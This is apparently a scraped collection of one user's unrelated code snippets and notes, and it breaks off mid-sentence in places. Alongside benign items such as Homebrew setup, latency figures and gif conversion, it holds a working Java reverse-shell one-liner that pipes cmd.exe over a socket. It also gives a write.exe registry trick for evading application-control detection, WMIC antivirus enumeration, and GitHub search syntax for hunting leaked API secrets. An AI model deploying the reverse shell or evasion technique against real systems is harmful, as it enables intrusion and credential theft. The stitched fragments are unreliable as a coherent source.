BenjiTrapp

Proxying binary execution through write.exe

Write.exe is a wrapper binary for launching wordpad. Historically it was used to launch Microsoft Write, a very basic word processor from pre-2000 era. It has been left as a compatibility stub from Windows 95 onwards.

This binary checks HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\wordpad.exe registry key for the location of wordpad's executable, which can be created by regular user. This might be utilized to confuse detection/application control solutions that rely on parent-child relationships. Resulting process will be spawned as a child to the Windows-signed (Signing Level 12) write.exe.

If one controls a domain, it is possible to utilize UNC paths to run remote binaries without dropping them to the disk. This requires additional steps to bypass security prompt.

tl;dr

I want to just run an exe

BenjiTrapp

Host Enumeration:

--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)

wmic computersystem LIST full

--- Anti-Virus ---

wmic /namespace:\\root\securitycenter2 path antivirusproduct

BenjiTrapp

var host="localhost";
var port=8044;
var cmd="cmd.exe";
var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();

BenjiTrapp

g.co, Google's official URL shortcut (update: or Google Workspace's domain verification, see bottom), is compromised. People are actively having their Google accounts stolen.

Someone just tried the most sophisticated phishing attack I've ever seen. I almost fell for it. My mind is a little blown.

1. Someone named "Chloe" called me from 650-203-0000 with Caller ID saying "Google". She sounded like a real engineer, the connection was super clear, and she had an American accent. Screenshot.

2. They said that they were from Google Workspace and someone had recently gained access to my account, which they had blocked. They asked me if I had recently logged in from Frankfurt, Germany and I said no.

3. I asked if they can confirm this is Google calling by emailing me from a Google email and they said sure and sent me this email and told me to look for a case number in it, which I saw in

BenjiTrapp

# Add user.
useradd -m username
# -m creates a home directory for the user.

# Set Password.
passwd username

# Set user group to sudo.
usermod -a -G sudo username
# -a option to add and ‘-G sudo’ means to add the user to the sudo group.

BenjiTrapp

This notes is written by Sheldon. You can find me with #iOSBySheldon in Github, Youtube, Facebook, etc.

Need

Convert .mov/.MP4 to .gif

Reason

As a developer, I feel better to upload a short video when I create the pull request to show other viewers what I did in this PR. I tried .mov format directly got after finishing recording screen using Quicktime, however, gif offers preview in most web pages, and has smaller file size.

This is not limited to developer, anyone has this need can use this method to convert the files.

BenjiTrapp

1. Run Software Update

Make sure everything is up to date in the App Store

2. Install Homebrew

1. Open a terminal window and execute the Homebrew install script:

/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

BenjiTrapp

1. Run Software Update

Make sure everything is up to date in the App Store

2. Install Homebrew

1. Open a terminal window and execute the Homebrew install script:

/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

BenjiTrapp

Latency Comparison Numbers (~2012)
----------------------------------
L1 cache reference                           0.5 ns
Branch mispredict                            5   ns
L2 cache reference                           7   ns                      14x L1 cache
Mutex lock/unlock                           25   ns
Main memory reference                      100   ns                      20x L2 cache, 200x L1 cache
Compress 1K bytes with Zippy             3,000   ns        3 us
Send 1K bytes over 1 Gbps network       10,000   ns       10 us
Read 4K randomly from SSD*             150,000   ns      150 us          ~1GB/sec SSD

BenjiTrapp

GitHub Search Syntax for Finding API Keys/Secrets/Tokens

As a security professional, it is important to conduct a thorough reconnaissance. With the increasing use of APIs nowadays, it has become paramount to keep access tokens and other API-related secrets secure in order to prevent leaks. However, despite technological advances, human error remains a factor, and many developers still unknowingly hardcode their API secrets into source code and commit them to public repositories. GitHub, being a widely popular platform for public code repositories, may inadvertently host such leaked secrets. To help identify these vulnerabilities, I have created a comprehensive search list using powerful search syntax that enables the search of thousands of leaked keys and secrets in a single search.

Search Syntax:

(path:*.{File_extension1} OR path:*.{File_extension-N}) AND ({Keyname1} OR {Keyname-N}) AND (({Signature/pattern1} OR {Signature/pattern-N}) AND ({PlatformTag1} OR {PlatformTag-N}))

Examples:

**1.